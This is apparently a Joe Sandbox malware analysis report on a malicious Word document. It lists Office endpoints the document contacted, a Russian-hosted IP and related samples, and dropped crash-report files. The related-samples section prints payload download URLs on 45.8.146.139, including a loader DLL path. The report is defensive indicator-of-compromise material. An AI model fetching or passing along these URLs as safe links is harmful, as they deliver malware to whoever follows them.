                                                          https://clients.config.office.net/dsWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://web.microsoftstream.com/video/2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                              		high
                                                              https://api.addins.store.officeppe.com/addinstemplateWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://substrate.office.compWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://graph.windows.net2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                                		high
                                                                https://login.windows.net/common/oauth2/authorizeR$WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://dataservice.o365filtering.com/ymWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://login.windows.net/common/oauth2/authorize/_WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://augloop.office.com/v2(WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://learningtools.onenote.com/learningtoolsapi/v2.0/GetvoicesWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                                        		high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                                          		high
                                                                          https://dataservice.o365filtering.com2p7WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://ncus.contentsync.WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord8WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://substrate.office.comNWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://login.windows.net/common/oauth2/authorize&zJWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://login.windows.net/common/oauth2/authorizeA$WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonVWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/WINWORD.EXE, 00000000.00000000.289192987.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.266167152.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                                                    		high
                                                                                    http://weather.service.msn.com/data.aspxWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                                                      		high
                                                                                      https://substrate.office.comPWINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://login.windows.net/common/oauth2/authorizeOtWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://substrate.office.comVWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://dataservice.o365filtering.com)n0WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		low
                                                                                          https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                                                            		high
                                                                                            https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                                                              		high
                                                                                              https://substrate.office.comWWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://login.windows.net/common/oauth2/authorizebWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://wus2.contentsync.WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://login.windows.net/common/oauth2/authorizedWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://login.windows.net/common/oauth2/authorize~tWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://globaldisco.crm.dynamics.comomWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://clients.config.office.net/user/v1.0/ios2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                                                                      		high
                                                                                                      https://login.windows.net/common/oauth2/authorizep$WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://login.windows.net/common/oauth2/authorizeXWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://login.windows.net/common/oauth2/authorizeYWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidv.WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://o365auditrealtimeingestion.manage.office.comWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                                                                                		high
                                                                                                                https://outlook.office.com&WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		low
                                                                                                                https://outlook.office365.com/api/v1.0/me/Activities2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                                                                                  		high
                                                                                                                  https://clients.config.office.net/user/v1.0/android/policies2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                                                                                    		high
                                                                                                                    https://login.windows.net/common/oauth2/authorizeRWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://login.windows.net/common/oauth2/authorizeSWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://analysis.windows.net/powerbi/apiUWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://entitlement.diagnostics.office.com2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                                                                                            		high
                                                                                                                            https://login.windows.net/common/oauth2/authorizeWWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://login.windows.net/common/oauth2/authorizeHWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://outlook.office.com/WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://clients.config.office.net/user/v1.0/mackWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://storage.live.com/clientlogs/uploadlocationWINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://login.windows.net/common/oauth2/authorizeNWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://login.windows.net/common/oauth2/authorizeBWINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://login.windows.net/common/oauth2/authorize;u%WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://login.windows.net/common/oauth2/authorizeCWINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://substrate.office.com/search/api/v1/SearchHistoryWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://login.windows.net/common/oauth2/authorizeFWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://login.windows.net/common/oauth2/authorizeq%WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://login.windows.net/common/oauth2/authorize;WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		high

                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                        Public IPs

                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                        45.8.146.139
                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                        		44676VMAGE-ASRUfalse

                                                                                                                                                        Private

                                                                                                                                                        IP
                                                                                                                                                        192.168.2.1

                                                                                                                                                        General Information

                                                                                                                                                        Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                        Analysis ID:682606
                                                                                                                                                        Start date and time:2022-08-11 18:57:37 +02:00
                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                        Overall analysis duration:0h 6m 2s
                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                        Report type:full
                                                                                                                                                        Sample file name:valliant.document.08.11.2022.doc
                                                                                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                        Run name:Potential for more IOCs and behavior
                                                                                                                                                        Number of analysed new started processes analysed:33
                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                        Technologies:
                                                                                                                                                        • HCA enabled
                                                                                                                                                        • EGA enabled
                                                                                                                                                        • HDC enabled
                                                                                                                                                        • GSI enabled (VBA)
                                                                                                                                                        • AMSI enabled
                                                                                                                                                        Analysis Mode:default
                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                        Detection:MAL
                                                                                                                                                        Classification:mal80.expl.winDOC@3/11@0/2
                                                                                                                                                        EGA Information:Failed
                                                                                                                                                        HDC Information:Failed
                                                                                                                                                        HCA Information:
                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                        Cookbook Comments:
                                                                                                                                                        • Found application associated with file extension: .doc
                                                                                                                                                        • Adjust boot time
                                                                                                                                                        • Enable AMSI
                                                                                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                        • Unable to detect Microsoft Word
                                                                                                                                                        • Close Viewer

                                                                                                                                                        Errors

                                                                                                                                                        • Corrupt sample or wrongly selected analyzer.

                                                                                                                                                        Warnings

                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.32.24, 52.109.88.39, 52.109.88.37, 20.189.173.21
                                                                                                                                                        • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                        Simulations

                                                                                                                                                        Behavior and APIs

                                                                                                                                                        TimeTypeDescription
                                                                                                                                                        18:59:16API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                        IPs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        45.8.146.139cnewton doc 08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
                                                                                                                                                        cnewton doc 08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
                                                                                                                                                        airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
                                                                                                                                                        wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
                                                                                                                                                        airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
                                                                                                                                                        airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
                                                                                                                                                        wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
                                                                                                                                                        wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
                                                                                                                                                        courtesyautomotivedoc08.11.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll
                                                                                                                                                        drinkcodeblue.file.08.11.22.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139/fhfty/IJQ_OLG8QW9DFH32ZO8BOJQ-PC_3SXMS/rm
                                                                                                                                                        dodsonimaging,file,08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm
                                                                                                                                                        feltenberger doc 08.11.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139/fhfty/R_PVSJYED3P2FDSONZYADP8GFZZLOA8D/loader_p3_dll_64_n5_crypt_x64_asm_clone_n101.dll
                                                                                                                                                        agsilverfile08.11.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139/fhfty/A0S35FRY5H5A0Q5SG6-TE3J_HSFO5KES/loader_p3_dll_64_n5_crypt_x64_asm_clone_n19.dll

                                                                                                                                                        Domains

                                                                                                                                                        No context

                                                                                                                                                        ASNs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        VMAGE-ASRUvalliant.document.08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139
                                                                                                                                                        cnewton doc 08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139
                                                                                                                                                        cnewton doc 08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139
                                                                                                                                                        airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139
                                                                                                                                                        wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139
                                                                                                                                                        airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139
                                                                                                                                                        airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139
                                                                                                                                                        wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139
                                                                                                                                                        wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139
                                                                                                                                                        courtesyautomotivedoc08.11.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139
                                                                                                                                                        drinkcodeblue.file.08.11.22.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139
                                                                                                                                                        dodsonimaging,file,08.11.2022.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139
                                                                                                                                                        feltenberger doc 08.11.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139
                                                                                                                                                        agsilverfile08.11.docGet hashmaliciousBrowse
                                                                                                                                                        • 45.8.146.139
                                                                                                                                                        GitmEGG60Q.exeGet hashmaliciousBrowse
                                                                                                                                                        • 45.159.251.68
                                                                                                                                                        80J4pAFU0A.exeGet hashmaliciousBrowse
                                                                                                                                                        • 45.159.248.53
                                                                                                                                                        Rwwsr82vkS.exeGet hashmaliciousBrowse
                                                                                                                                                        • 45.159.248.53
                                                                                                                                                        sJq1pykxns.exeGet hashmaliciousBrowse
                                                                                                                                                        • 45.159.248.53
                                                                                                                                                        3RkGCbnoKw.exeGet hashmaliciousBrowse
                                                                                                                                                        • 45.159.248.53
                                                                                                                                                        60MLnq8Uma.exeGet hashmaliciousBrowse
                                                                                                                                                        • 45.159.248.53

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        No context

                                                                                                                                                        Dropped Files

                                                                                                                                                        No context

                                                                                                                                                        Created / dropped Files

                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_WINWORD.EXE_2bb258ba8dfc7dfa5c63c367cd77571e93c8305c_5f94c319_0841aa39\Report.wer

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):65536
                                                                                                                                                        Entropy (8bit):1.6333582842029912
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:hIrTZNvH7OHSTjjKYbVrPR/wttRJp/u7snS274Itu0:qrnv7OHSTjdRY3RJp/u7snX4Itu
                                                                                                                                                        MD5:AC6EEF4FA3F48FD8D1EFE0C61C9404E6
                                                                                                                                                        SHA1:2CF87F041CDFFFC1E6FFA75C936F0CC726F62460
                                                                                                                                                        SHA-256:CAB32F91FCE62092D1FB0AEAF4E7124F7BB45686540A1C5AD1BA0088843FAF79
                                                                                                                                                        SHA-512:98E86550AA14AFCAD490EBD5EA37C85A9FE25D535A44BBF3B72C54774EB7A8C34C722A0AE4C473D992EAEDCF506DBFF97A5100721D9FB0A66E4113BBFBDCFCFD
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.4.7.4.3.1.5.0.1.0.3.4.9.4.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.4.7.4.3.1.5.2.8.5.3.4.8.6.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.b.b.4.5.e.e.c.-.f.2.d.2.-.4.5.c.c.-.a.6.5.b.-.2.1.1.d.a.9.b.3.6.a.2.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.6.5.4.a.8.7.-.0.5.8.3.-.4.9.c.4.-.8.9.9.a.-.d.0.6.7.5.e.1.5.a.3.7.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.I.N.W.O.R.D...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.W.i.n.W.o.r.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.5.c.-.0.0.0.1.-.0.0.1.d.-.2.6.8.b.-.8.2.0.8.e.f.a.d.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.5.9.8.d.3.2.8.7.9.1.6.f.3.7.4.a.8.3.9.5.5.6.0.5.5.d.0.3.4.2.7.0.0.0.0.0.0.0.0.!.0.0.0.0.4.0.4.d.e.7.5.4.4.5.9.8.f.0.8.7.2.3.e.a.1.f.1.3.c.0.7.2.4.a.e.f.5.a.c.5.a.f.3.

                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER8FDB.tmp.dmp

                                                                                                                                                        Download File
